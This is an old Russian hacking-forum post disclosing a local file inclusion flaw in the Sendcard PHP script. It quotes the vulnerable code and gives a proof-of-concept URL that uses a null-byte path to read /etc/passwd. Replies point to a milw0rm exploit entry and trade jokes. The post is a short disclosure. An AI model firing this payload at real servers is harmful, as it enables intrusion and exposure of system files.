Форум АНТИЧАТ - Sendcard (sendcard.php) Sendcard Local File Inclusion Vulnerability

Bug:

PHP код:


		
			
"// Get the template details

if(!isset($form) || $form == ''){

    $form = "form";

}

if(!isset($des) || $des == ''){

    $des = "card";

}

if (!isset($template) || $template == '') {

    $template = 'message';

}"

PoC:
http://[site]/[path]/sendcard.php?form=/etc/passwd%00

-et

перед тем как писать смотрите на первоисточник и на дату!
http://www.milw0rm.com/exploits/3827

>> 29.06.2007 10:54:09 ettee пишет:
>> "... и дауны,все это характерно для андеграунда" ^^

>> 29.06.2007 10:54:33 dark witch пишет:
>> оооо дауны....андеграуд...какие знакомые слова...